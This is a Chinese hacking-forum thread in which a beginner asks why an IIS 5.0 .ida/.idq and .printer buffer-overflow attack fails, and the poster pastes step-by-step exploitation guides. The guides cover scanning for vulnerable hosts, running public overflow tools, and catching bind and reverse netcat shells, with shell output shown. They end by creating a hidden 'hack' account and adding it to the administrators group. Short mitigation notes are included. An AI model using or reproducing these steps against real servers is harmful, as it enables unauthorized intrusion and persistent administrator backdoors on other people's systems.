论坛: 菜鸟乐园 标题: IIS漏洞~~ 复制本贴地址    
作者: aa11 [aa11]    论坛用户   登录
[IIS漏洞]

可能存在"IIS 5.0 .printer远程缓冲区溢出"漏洞 

可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida) 
可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq) 

 
该怎么利用啊?
用了SNAKE的IIS溢出工具,
显示发送成功~
但却TELNET不上去啊~~
这是怎么回事啊??


地主 发表时间: 03/04 04:39

回复: laievf [laievf]   论坛用户   登录
http://www.isyubin.com/ychtml/ycwin2kld.htm
看下面的那些


B1层 发表时间: 03/04 07:00

回复: aa11 [aa11]   论坛用户   登录
*.idq漏洞:

IIS 在处理以".ida"为扩展名的URL请求时,它会有两种结果。 一个可能的结果是服务器回复"URL String too long"的信息;或类似"Cannot find the specified path" 的信息。另一种可能就是服务器端服务停止,并返回"Access Violation"信息(即成功的实现了对服务器端的拒绝服务攻击。
用流光扫IP,找存在*.idq漏洞的机器,例如IP:202.1.1.3存在此漏洞。
这里使用snake的IIS溢出工具。
IISMiscOverflowV1_Build0010是其中图形界面的工具,在被攻击地址上填202.1.1.3,端口:80,操作系统类型选:IIS5中文win2kSp0,绑定端口813,然后按IDQ溢出。发送成功。
在cmd下输入:
c:\>nc �Cvv 202.1.1.3 813
202.1.1.3: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [202.1.1.3] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
没成功,我们换IIS5中文win2kSp1或win2kSp2再试试。然后同样的再输入:
c:\>nc �Cvv 202.1.1.3 813
202.1.1.3: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [202.1.1.3] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
这样就成功了。大多数情况下,站点很少使用扩展名为".ida"和".idq"的文件,可在ISAPI脚本映射中,将扩展名为".ida"和".idq"的应用程序映射删除。
*.printer漏洞:




我也是这么做的,
但却没有成功???
WHY~~~~~~~~


B2层 发表时间: 03/04 23:05

回复: aa11 [aa11]   论坛用户   登录
微软Win 2K IIS 5的打印ISAPI扩展接口建立了.printer扩展名到msw3prt.dll的映射关系,缺省情况下该映射存在。当远程用户提交对.printer的URL请求时,IIS 5调用msw3prt.dll解释该请求。由于msw3prt.dll缺乏足够的缓冲区边界检查,远程用户可以提交一个精心构造的针对.printer的URL请求,其"Host:"域包含大约420字节的数据,此时在msw3prt.dll中发生典型的缓冲区溢出,潜在允许执行任意代码。溢出发生后,WEB服务停止响应,Win 2K可以检查到WEB服务停止响应,从而自动重启它,因此系统管理员很难意识到发生过攻击。
同样的,用流光扫一个存在*.printer漏洞的机器,IP:202.1.1.4
这里使用小榕的IIS5Exploit。
IIS5 .Printer Exploit 使用说明:
本程序适用于英文版IIS 5.0
1、首先在本机用NC开一个监听端口。
C:\>nc -l -p 99
2、运行IIS5Exploit
D:\>IIS5Exploit xxx.xxx.xxx.xxx 211.152.188.1 99
===========IIS5 English Version .Printer Exploit.===========
===Written by Assassin 1995-2001. http://www.netXeyes.com===
Connecting 211.152.188.1 ...OK.
Send Shell Code ...OK
IIS5 Shell Code Send OK
其中211.152.188.1指向本地IP。
稍等片刻,如果成功在本机NC舰艇的端口出现:
C:\>nc -l -p 99
Microsoft Windows 2000[Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\>
可以执行命令。如:
C:\>net user hack password /add
The command completed successfully.
C:\>net localgroup administrartors hack /add
这样就创建了一个属于Administrator组的用户Hack,密码为password.。
要解决此漏洞有两种方法1. 删除.printer扩展 2. 安装微软提供的补丁


我是这样做的啊~~

B3层 发表时间: 03/04 23:07

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号